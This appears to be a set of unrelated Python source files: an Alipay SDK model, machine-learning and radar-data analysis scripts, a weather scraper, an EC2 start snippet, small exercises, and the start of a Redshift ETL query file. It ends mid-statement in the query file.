self._scene_code = value
@property
def tag_code(self):
return self._tag_code
@tag_code.setter
def tag_code(self, value):
self._tag_code = value
@property
def tag_value(self):
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.mobile:
if hasattr(self.mobile, 'to_alipay_dict'):
params['mobile'] = self.mobile.to_alipay_dict()
else:
params['mobile'] = self.mobile
if self.scene_code:
if hasattr(self.scene_code, 'to_alipay_dict'):
params['scene_code'] = self.scene_code.to_alipay_dict()
else:
params['scene_code'] = self.scene_code
if self.tag_code:
if hasattr(self.tag_code, 'to_alipay_dict'):
params['tag_code'] = self.tag_code.to_alipay_dict()
else:
params['tag_code'] = self.tag_code
if self.tag_value:
if hasattr(self.tag_value, 'to_alipay_dict'):
params['tag_value'] = self.tag_value.to_alipay_dict()
else:
params['tag_value'] = self.tag_value
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayFundTransIcrowdTagModifyModel()
if 'mobile' in d:
o.mobile = d['mobile']
if 'scene_code' in d:
o.scene_code = d['scene_code']
if 'tag_code' in d:
o.tag_code = d['tag_code']
if 'tag_value' in d:
o.tag_value = d['tag_value']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
import pandas as pd
import os
from sklearn.model_selection import train_test_split
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def train_val_split(trainx_path, trainy_path, trainpx_path,
trainpy_path,valx_path, valy_path):
trainx = pd.read_csv(trainx_path, encoding="utf_8")
trainy = pd.read_csv(trainy_path, encoding="utf_8")
print("The length of trainX is %i" % len(trainx))
print("The length of trainy is %i" % len(trainy))
#训练集与验证集划分
Xtrain, Xval, ytrain, yval = train_test_split(trainx, trainy, test_size=0.002,
random_state=7)
#保存
Xtrain.to_csv(trainpx_path, sep="\t", index=None, header=False)
ytrain.to_csv(trainpy_path, sep="\t", index=None, header=False)
Xval.to_csv(valx_path, sep="\t", index=None, header=False)
yval.to_csv(valy_path, sep="\t", index=None, header=False)
if __name__ == "__main__":
train_val_split("{}/Dataset/train_set.seg_x.txt".format(BASE_DIR),
"{}/Dataset/train_set.seg_y.txt".format(BASE_DIR),
"{}/Dataset/train_split_x.txt".format(BASE_DIR),
"{}/Dataset/train_split_y.txt".format(BASE_DIR),
"{}/Dataset/val_x.txt".format(BASE_DIR),
"{}/Dataset/val_y.txt".format(BASE_DIR))
|
#!/usr/bin/env python
import re
import sys
import array
import ROOT
ROOT.gROOT.SetBatch(True)
ROOT.PyConfig.IgnoreCommandLineOptions = True
colors = [
ROOT.kBlue,
ROOT.kRed+1,
ROOT.kBlack
]
def findBounds(x, ys, xmin=None, ymin=None, xmax=None, ymax=None):
if xmin is None:
xmin = min(x)
if xmax is None:
xmax = max(x)
if ymin is None:
ymin = min([min(y) for y in ys])
if ymax is None:
ymax = max([max(y) for y in ys]) * 1.1
return (xmin, ymin, xmax, ymax)
def makePlot(name, x, ys, ytitle,
title=None,
legends=None,
ideal1=None,
bounds={},
legendYmax=0.99
):
canv = ROOT.TCanvas()
canv.cd()
canv.SetTickx(1)
canv.SetTicky(1)
canv.SetGridy(1)
bounds = findBounds(x, ys, **bounds)
frame = canv.DrawFrame(*bounds)
frame.GetXaxis().SetTitle("Number of threads")
frame.GetYaxis().SetTitle(ytitle)
if title is not None:
frame.SetTitle(title)
frame.Draw("")
leg = None
if legends is not None:
leg = ROOT.TLegend(0.77,legendYmax-0.19,0.99,legendYmax)
graphs = []
if ideal1 is not None:
ymax = bounds[3]
ideal_y = [ideal1, ymax]
ideal_x = [1, ymax/ideal1]
gr = ROOT.TGraph(2, array.array("d", ideal_x), array.array("d", ideal_y))
gr.SetLineColor(ROOT.kBlack)
gr.SetLineStyle(3)
gr.Draw("same")
if leg:
leg.AddEntry(gr, "Ideal scaling", "l")
graphs.append(gr)
for i, y in enumerate(ys):
gr = ROOT.TGraph(len(x), array.array("d", x), array.array("d", y))
color = colors[i]
gr.SetLineColor(color)
gr.SetMarkerColor(color)
gr.SetMarkerStyle(ROOT.kFullCircle)
gr.SetMarkerSize(1)
gr.Draw("LP SAME")
if leg:
leg.AddEntry(gr, legends[i], "lp")
graphs.append(gr)
if leg:
leg.Draw("same")
canv.SaveAs(name+".png")
canv.SaveAs(name+".pdf")
def main(argv):
(inputfile, outputfile, graph_label) = argv[1:4]
re_mt = re.compile("nTH(?P<th>\d+)_nEV(?P<ev>\d+)")
re_mp = re.compile("nJOB(?P<job>\d+)")
mt = {}
mp = {}
f = open(inputfile)
for line in f:
if not "AVX512" in line:
continue
comp = line.split(" ")
m = re_mt.search(comp[0])
if m:
if m.group("th") != m.group("ev"):
raise Exception("Can't handle yet different numbers of threads (%s) and events (%s)" % (m.group("th"), m.group("ev")))
mt[int(m.group("th"))] = float(comp[1])
continue
m = re_mp.search(comp[0])
if m:
mp[int(m.group("job"))] = float(comp[1])
f.close()
ncores = sorted(list(set(mt.keys() + mp.keys())))
mt_y = [mt[n] for n in ncores]
mp_y = [mp[n] for n in ncores]
ideal1 = mt_y[0]/ncores[0]
ideal1_mp = mp_y[0]/ncores[0]
makePlot(outputfile+"_throughput", ncores,
[mt_y, mp_y],
"Throughput (events/s)",
title=graph_label,
legends=["Multithreading", "Multiprocessing"],
ideal1=ideal1,
bounds=dict(ymin=0, xmin=0),
legendYmax=0.5
)
eff = [mt_y[i]/mp_y[i] for i in xrange(0, len(ncores))]
makePlot(outputfile+"_efficiency", ncores,
[eff],
"Multithreading efficiency (MT/MP)",
title=graph_label,
bounds=dict(ymin=0.9, ymax=1.1)
)
eff_vs_ideal_mt = [mt_y[i]/(ideal1*n) for i, n in enumerate(ncores)]
eff_vs_ideal_mp = [mp_y[i]/(ideal1*n) for i, n in enumerate(ncores)]
makePlot(outputfile+"_efficiency_ideal", ncores,
[eff_vs_ideal_mt, eff_vs_ideal_mp],
"Efficiency wrt. ideal",
title=graph_label,
legends=["Multithreading", "Multiprocessing"],
bounds=dict(ymin=0.8, ymax=1.01, xmax=65),
legendYmax=0.9
)
speedup_mt = [mt_y[i]/ideal1 for i in xrange(0, len(ncores))]
speedup_mp = [mp_y[i]/ideal1 for i in xrange(0, len(ncores))]
makePlot(outputfile+"_speedup", ncores,
[speedup_mt, speedup_mp],
"Speedup wrt. 1 thread",
title=graph_label,
legends=["Multithreading", "Multiprocessing"],
ideal1=1,
bounds=dict(ymin=0, xmin=0),
legendYmax=0.5
)
if __name__ == "__main__":
main(sys.argv)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 27 12:12:41 2019
@author: dori
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('..')
from READ import slice_data
from READ import read_variables
from statistic import hist_and_plot
from air_properties import FooteduToit_coeff
from scipy.special import gamma
rho = 1000.0
a = rho*np.pi/6.0
b = 3.0
def mD(D):
return a*D**b
def Dm(m):
return (m/a)**(1/b)
nu=0.0
mu=1.0/3.0
gam = b*mu
mup = b*nu + b - 1.0
av = 114.0137
bv = 0.23437
alpha = 9.292
beta = 9.623
ctilde = 622.2
rho_w = 1000.0
c = ctilde*(6.0/(np.pi*rho_w))**mu
def lam(N, q):
return (N*gamma((nu+2)/mu)/(q*gamma((nu+1)/mu)))**mu
def A(N, lam):
return N*mu*lam**((nu+1)/mu)/gamma((nu+1)/mu)
def LAM(lam):
return lam*a**mu
def N0(A):
return A*b*a**(nu+1)
def MkN(N0, LAM, k):
return N0*gamma((mup+k+1)/gam)/(gam*LAM**((mup+k+1)/gam))
def Mkf(A, lam, k):
return A*gamma((nu+k+1)/mu)/(mu*lam**((nu+k+1)/mu))
def qN2Dm(q, N):
ll = lam(N, q)
AA = A(N, ll)
LL = LAM(ll)
NN = N0(AA)
return MkN(NN, LL, 4)/MkN(NN, LL, 3)
def qN2MDVp(q, N):
ll = lam(N, q)
AA = A(N, ll)
return -av*Mkf(AA, ll, 2+bv)/Mkf(AA, ll, 2)
def qN2SWp(q, N):
ll = lam(N, q)
AA = A(N, ll)
mdv = -qN2MDVp(q, N)
return np.sqrt(av*av*Mkf(AA, ll, 2+2*bv)/Mkf(AA, ll, 2) - mdv*mdv)
def qN2MDVa(q, N):
ll = lam(N, q)
AA = A(N, ll)
return -(alpha - beta*Mkf(AA, ll+c, 2)/Mkf(AA, ll, 2))
def qN2SWa(q, N):
ll = lam(N, q)
AA = A(N, ll)
mdv = -qN2MDVa(q, N)
return np.sqrt(alpha*alpha + beta*(-2*alpha*Mkf(AA, ll+c, 2) + beta*Mkf(AA, ll+2*c, 2))/Mkf(AA, ll, 2) - mdv*mdv)
def qN2SKa(q, N):
ll = lam(N, q)
AA = A(N, ll)
mdv = -qN2MDVa(q, N)
sw = qN2SWa(q, N)
M3 = alpha**3*Mkf(AA, ll, 2) - 3*alpha**2*beta*Mkf(AA, ll+c, 2) + \
3*alpha*beta**2*Mkf(AA, ll+2*c, 2) - beta**3*Mkf(AA, ll+3*c, 2)
return M3/(sw**3*Mkf(AA, ll, 2)) - 3*mdv/sw - (mdv/sw)**3
def qN2moments(q, N):
ll = lam(N, q)
AA = A(N, ll)
M2 = Mkf(AA, ll, 2)
M2_b = Mkf(AA, ll, 2+bv)
mdv = av*M2_b/M2
M2b_2 = Mkf(AA, ll, 2*bv+2)
sw = np.sqrt(av**2*M2b_2/M2 - mdv*mdv)
M2_3b = Mkf(AA, ll, 2+3*bv)
sk = av**3*M2_3b/(sw**3*Mkf(AA, ll, 2)) - 3*mdv/sw - (mdv/sw)**3
return -mdv, sw, sk
def Matrosov17(DDV): # Ka-W
if 0.0<=DDV<=1:
return 0.47+0.49*DDV**0.54
elif DDV<2.4:
return 1.338+DDV*(-0.977+DDV*(0.678-DDV*0.079))
else:
return np.nan
vMatrosov17 = np.vectorize(Matrosov17)
def Kamil19(DDV): # X-W
return 0.576+DDV*(0.905+DDV*(-0.779+DDV*(0.451+DDV*(-0.108+DDV*0.009))))
accMins = 5
freq = str(accMins)+'min'
iconfile = 'data/precipitation_icon.h5'
icon = pd.read_hdf(iconfile, key='stat')
icon = icon.reset_index().drop_duplicates(subset='index',
keep='last').set_index('index')
pluviofile = 'data/precipitation_pluvio.h5'
pluvio = pd.read_hdf(pluviofile, key='stat')
mrrfile = 'data/precipitation_mrr.h5'
mrr = pd.read_hdf(mrrfile, key='stat')
mrr = mrr.resample(freq).apply(np.nansum)
ixi = pd.date_range(start='2015-11-11', end='2016-1-4', freq='9s')
icon.reindex(ixi)
icon = icon.resample(freq).apply(np.nansum)
ixp = pd.date_range(start='2015-11-11', end='2016-1-4', freq='1min')
pluvio.reindex(ixp)
pluvio = pluvio.resample(freq).apply(np.nansum)
pamtra = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
hydroset='all_hydro', suffix='pamtra_icon.h5',
pamtra=True, minhour=6.0,
varlist=['Z10', 'Z35', 'Z94', 'W10', 'W35', 'W94',
'T', 'unixtime', 'P', 'RH', 'QNR', 'QR',
'QG', 'QI', 'QS', 'QH', 'QC', 'S35',
'V10', 'V35', 'V94'])
pamtra['Q'] = pamtra['QR']+pamtra['QG']+pamtra['QI']+pamtra['QS']+pamtra['QH']+pamtra['QC']
pamtra['R/Q'] = pamtra['QR']/pamtra['Q']
#ice = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
# hydroset='only_ice', suffix='pamtra_icon.h5', pamtra=True,
# varlist=['Z10', 'Z35', 'Z94', 'T',
# 'V10', 'V35', 'V94', 'unixtime',
# 'W10', 'W35', 'W94'], minhour=6.0)
#
#snow = read_variables(path='/work/develop/pamtraICON/comparison/data/pamtra/',
# hydroset='only_snow', suffix='pamtra_icon.h5', pamtra=True,
# varlist=['Z10', 'Z35', 'Z94', 'T',
# 'V10', 'V35', 'V94', 'unixtime',
# 'W10', 'W35', 'W94'], minhour=6.0)
radar = read_variables(path='/work/develop/pamtraICON/comparison/data/radar/',
hydroset='', suffix='radar_regrid.h5', minhour=6.0,
varlist=['Z10', 'Z35', 'Z94', 'T', 'P', 'RH',
'V10avg', 'V35avg', 'V94avg', 'W10', 'W35', 'W94',
'unixtime', 'quality_x', 'quality_w'])
radar.unixtime = pd.to_datetime(radar.unixtime.astype(np.int64), unit='s')
pamtra.unixtime = pd.to_datetime(pamtra.unixtime.astype(np.int64), unit='s')
radar['RR'] = (pluvio.resample('1s').nearest().loc[radar.unixtime]*60/accMins).values
pamtra['RR'] = (icon.resample('1s').nearest().loc[pamtra.unixtime]*60/accMins).values
#radarw = slice_data(radar, 'quality_w', maxvalue=8192)
#radarx = slice_data(radar, 'quality_x', maxvalue=8192)
pamtra = slice_data(pamtra, 'Z35', -15.0)
radar = slice_data(radar, 'Z35', -15.0)
logrule = True
density = False
CFAD = True
inverty = True
bins = 100
stats = ['mean', 'median', 'quartile', 'decile']
## High precipitation
minRR = 1.0
maxRR = 91.0
pre = 'HIG'
mdv, sw, sk = qN2moments(pamtra['QR'], pamtra['QNR'])
pamtra['MDVp'] = mdv
pamtra['SWp'] = sw
pamtra['SKp'] = sk
pamtra['MDVa'] = qN2MDVa(pamtra['QR'], pamtra['QNR'])
pamtra['SWa'] = qN2SWa(pamtra['QR'], pamtra['QNR'])
pamtra['SKa'] = qN2SKa(pamtra['QR'], pamtra['QNR'])
f, ((ax11, ax12), (ax21, ax22), (ax31, ax32)) = plt.subplots(3, 2, figsize=(10.5, 9.))
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, left=True),
'Simulated MDV Ka',
yvar='T', xvar='V35',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax11), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Measured MDV Ka',
yvar='T', xvar='V35avg',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax12), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Measured SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax22), stats=stats,
bins=(np.linspace(0, 3), np.linspace(0, 10)),
density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, left=True),
'Simulated SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax21), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
radar['Dm1'] = vMatrosov17((radar['V94avg']-radar['V35avg'])/FooteduToit_coeff(radar['P'], radar['T']+273.15, radar['RH']))
radar['Dm2'] = Kamil19((radar['V94avg']-radar['V10avg'])/FooteduToit_coeff(radar['P'], radar['T']+273.15, radar['RH']))
pamtra['Dm'] = qN2Dm(pamtra['QR'], pamtra['QNR'])*1000.0
pamtra.loc[pamtra.QNR < 1, 'Dm'] = np.nan
pamtra['Dm1'] = vMatrosov17((pamtra['V94']-pamtra['V35'])/FooteduToit_coeff(pamtra['P'], pamtra['T']+273.15, pamtra['RH']))
pamtra['Dm2'] = Kamil19((pamtra['V94']-pamtra['V10'])/FooteduToit_coeff(pamtra['P'], pamtra['T']+273.15, pamtra['RH']))
radar.loc[radar['Dm1']<0.0]['Dm1'] = np.nan
radar.loc[radar['Dm2']<0.0]['Dm2'] = np.nan
r = hist_and_plot(slice_data(pamtra,
'RR', minvalue=minRR, left=True),
'Simulated Dm rain',
yvar='T', xvar='Dm',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax31), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, left=True),
'Retrieved Dm rain',
yvar='T', xvar='Dm2',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax32), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
f.suptitle('T-MDV CFADs RR>1 mm/h', fontsize=12, fontweight='heavy', y=0.99)
f.tight_layout(pad=1.5, h_pad=0.5, w_pad=0.5)
f.text(x=0.5, y=0.66, s='T-SW CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.text(x=0.5, y=0.33, s='T-Dm CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.savefig(pre+'pamRad_T_VSD.png', dpi=300)
## Low precipitation
minRR = -1.0
maxRR = 1.0
pre = 'LOW'
f, ((ax11, ax12), (ax21, ax22), (ax31, ax32)) = plt.subplots(3, 2, figsize=(10.5, 9.))
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated MDV Ka',
yvar='T', xvar='V35',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax11), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Measured MDV Ka',
yvar='T', xvar='V35avg',
xlabel='MDV [m/s]', ylabel='T [deg C]',
vminmax=[0.1, 30],
xlim=[-10, 0], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax12), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Measured SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax22), stats=stats,
bins=(np.linspace(0, 3), np.linspace(0, 10)),
density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra, 'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated SW Ka',
yvar='T', xvar='W35',
xlabel='SW [m/s]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax21), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(pamtra,#slice_data(pamtra, 'R/Q', minvalue=0.8),
'RR', minvalue=minRR, maxvalue=maxRR),
'Simulated Dm rain',
yvar='T', xvar='Dm',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax31), stats=stats,
bins=bins, density=density, CFAD=CFAD)
r = hist_and_plot(slice_data(radar, 'RR', minvalue=minRR, maxvalue=maxRR),
'Retrieved Dm rain',
yvar='T', xvar='Dm2',
xlabel='Dm [mm]',
ylabel='T [deg C]',
vminmax=[0.1, 40],
xlim=[0, 3], ylim=[0, 10], lognorm=logrule,
savename=pre+'pamRad_T_VSD.png',
inverty=inverty, figax=(f, ax32), stats=stats,
bins=(r[4], r[5]), density=density, CFAD=CFAD)
f.suptitle('T-MDV CFADs RR<1 mm/h', fontsize=12, fontweight='heavy', y=0.99)
f.tight_layout(pad=1.5, h_pad=0.5, w_pad=0.5)
f.text(x=0.5, y=0.66, s='T-SW CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.text(x=0.5, y=0.33, s='T-Dm CFADs', fontsize=12, fontweight='heavy',
horizontalalignment='center')
f.savefig(pre+'pamRad_T_VSD.png', dpi=300)
pam = slice_data(pamtra, 'T', minvalue=6)
plt.figure()
plt.scatter(pam.Dm, pam.W35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.SWa, label='Atlas')
plt.scatter(pam.Dm, pam.SWp, label='powerLaw')
plt.xlabel('Dm [mm]'); plt.ylabel('SW [m/s]')
plt.grid(); plt.legend()
plt.savefig('SW_Dm_analysis.png')
plt.figure()
plt.scatter(pam.Dm, pam.V35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.MDVa, label='Atlas')
plt.scatter(pam.Dm, pam.MDVp, label='powerLaw')
plt.xlabel('Dm [mm]'); plt.ylabel('MDV [m/s]')
plt.grid(); plt.legend()
plt.savefig('MDV_Dm_analysis.png')
plt.figure()
plt.scatter(pam.Dm, pam.S35, label='pamtra with Atlas')
plt.scatter(pam.Dm, pam.SKa, label='Atlas')
plt.scatter(pam.Dm, pam.SKp, label='powerLaw')
plt.ylim([-1,1])
plt.xlabel('Dm [mm]'); plt.ylabel('Skewness')
plt.grid(); plt.legend()
plt.savefig('SK_Dm_analysis.png')
|
import os
import boto3
for i in ec2.instances.all():
if i.state['Name'] == 'stopped':
i.start()
print("Instance started: ", instance[0].id)
|
import unittest
def split_on_dash(string):
return string.split('-')
class TestSplitOnDash(unittest.TestCase):
def test(self):
self.assertEqual(split_on_dash('hi-hi'), ['hi', 'hi'])
if __name__ == '__main__':
unittest.main()
|
import random
anagramma = ('корова','правило','конфета',)
# случайным образом выбираем из последовательности одно слово
word = random.choice(anagramma)
correct = word
# создаем анаграмму выбранного слова, в которой буквы будут расставлены хаотично
mixed = ""
while word:
position = random.randrange(len(word))
mixed+= word[position]
word = word[:position] + word[(position + 1):]
print(mixed) |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 17:10:58 2020
@author: 59654
"""
import requests
import json
import pandas as pd
import re
from bs4 import BeautifulSoup
def geturl(month):
m = '%02d'%month
url = "http://tianqi.2345.com/t/wea_history/js/2020"+m+"/58457_2020"+m+".js"
return url
def getweather(month_start,month_end):
headers = {}
headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36' #http头大小写不敏感
headers['accept'] = '*/*'
headers['Connection'] = 'keep-alive'
headers['Pragma'] = 'no-cache'
#url = "http://tianqi.2345.com/t/wea_history/js/202005/58457_202005.js" # 58457 代表杭州
result = []
for month in range(month_start,month_end+1):
url = geturl(month)
res = requests.get(url)
data=json.dumps(res.text, indent=2,ensure_ascii=False)
#print(data[17:])
b=res.text.split('[')
c=b[1].replace('"','')
f=re.findall(r'\{(.*?)\}', str(c))
# tianqi=[]
for i in f[:-1]:
i={i.replace("'",'')}
xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
yy=xx.split(' ')
#print(yy)
# tianqi.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
#print(tianqi)
# print('日期 最高气温 最低气温 天气 风向风力 空气质量指数')
# print(tianqi)
weather=pd.DataFrame(result)
weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
return weather
def getweathercsv(month_start,month_end):
headers = {}
headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36' #http头大小写不敏感
headers['accept'] = '*/*'
headers['Connection'] = 'keep-alive'
headers['Pragma'] = 'no-cache'
#url = "http://tianqi.2345.com/t/wea_history/js/202005/58457_202005.js" # 58457 代表杭州
result = []
for month in range(month_start,month_end+1):
url = geturl(month)
res = requests.get(url)
data=json.dumps(res.text, indent=2,ensure_ascii=False)
#print(data[17:])
b=res.text.split('[')
c=b[1].replace('"','')
f=re.findall(r'\{(.*?)\}', str(c))
# tianqi=[]
for i in f[:-1]:
i={i.replace("'",'')}
xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
yy=xx.split(' ')
#print(yy)
# tianqi.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
#print(tianqi)
# print('日期 最高气温 最低气温 天气 风向风力 空气质量指数')
# print(tianqi)
weather=pd.DataFrame(result)
weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
weather.to_csv(str(data[24:26])+str(month_start)+'月_'+str(month_end)+'月.csv',encoding="utf_8_sig")
# getweather(1,8)
def getweather_onemonth(month):
headers = {}
headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36' #http头大小写不敏感
headers['accept'] = '*/*'
headers['Connection'] = 'keep-alive'
headers['Pragma'] = 'no-cache'
# url = "http://tianqi.2345.com/t/wea_history/js/202005/58457_202005.js" # 58457 代表杭州
result = []
url = geturl(month)
res = requests.get(url)
data=json.dumps(res.text, indent=2,ensure_ascii=False)
#print(data[17:])
b=res.text.split('[')
c=b[1].replace('"','')
f=re.findall(r'\{(.*?)\}', str(c))
# tianqi=[]
for i in f[:-1]:
i={i.replace("'",'')}
xx= re.sub("[A-Za-z\!\%\[\]\,\。]", " ", str(i))
yy=xx.split(' ')
#print(yy)
# tianqi.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
result.append([data[24:26], yy[3][1:], yy[10][1:-1], yy[17][1:-1], yy[24][1:], yy[34][1:],yy[41][1:], yy[45][1:],yy[53][1:]])
#print(tianqi)
# print('日期 最高气温 最低气温 天气 风向风力 空气质量指数')
# print(tianqi)
weather=pd.DataFrame(result)
weather.columns=['城市',"日期","最高气温","最低气温","天气","风向",'风力','空气质量指数','空气质量']
return weather |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the workbook function below.
def workbook(n, k, arr):
page_no = 1
count = 0
for i in arr:
com_pg = i//k
prob_last = i%k
idx = 1
for _ in range(com_pg):
if page_no in range(idx, idx+k):
count += 1
idx += k
page_no += 1
if prob_last != 0:
if page_no in range(idx, idx+prob_last):
count+=1
page_no += 1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nk = input().split()
n = int(nk[0])
k = int(nk[1])
arr = list(map(int, input().rstrip().split()))
result = workbook(n, k, arr)
fptr.write(str(result) + '\n')
fptr.close()
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
# DROP TABLES
staging_events_table_drop = "DROP TABLE IF EXISTS staging_events"
staging_songs_table_drop = "DROP TABLE IF EXISTS staging_songs"
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
staging_events_table_create= ("""CREATE TABLE staging_events(
event_id INT IDENTITY(0,1) PRIMARY KEY,
artist_name VARCHAR(50),
auth VARCHAR(50),
first_name VARCHAR(255),
gender VARCHAR(1),
item_in_session INTEGER,
last_name VARCHAR(50),
song_length FLOAT,
level VARCHAR(50),
location VARCHAR,
method VARCHAR,
page VARCHAR,
registration FLOAT,
session_id BIGINT,
song_title VARCHAR,
status INTEGER,
ts BIGINT,
user_agent VARCHAR,
user_id VARCHAR)
""")
staging_songs_table_create = ("""CREATE TABLE staging_songs(
song_id VARCHAR PRIMARY KEY,
num_songs INTEGER,
artist_id VARCHAR(100),
latitude FLOAT,
longitude FLOAT,
location VARCHAR(255),
name VARCHAR(50),
title VARCHAR(255),
duration FLOAT,
year INTEGER)
""")
songplay_table_create = ("""CREATE TABLE songplays(
songplay_id INT IDENTITY(1,1) PRIMARY KEY,
start_time TIMESTAMP REFERENCES time(start_time),
user_id VARCHAR REFERENCES users(user_id),
level VARCHAR(50),
song_id VARCHAR REFERENCES songs(song_id),
artist_id VARCHAR REFERENCES artists(artist_id),
session_id BIGINT,
location VARCHAR(255),
user_agent TEXT)
""")
user_table_create = ("""CREATE TABLE users(
user_id VARCHAR PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR(1),
level VARCHAR(50))
""")
song_table_create = ("""CREATE TABLE songs(
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INTEGER,
duration FLOAT)
""")
artist_table_create = ("""CREATE TABLE artists(
artist_id VARCHAR PRIMARY KEY,
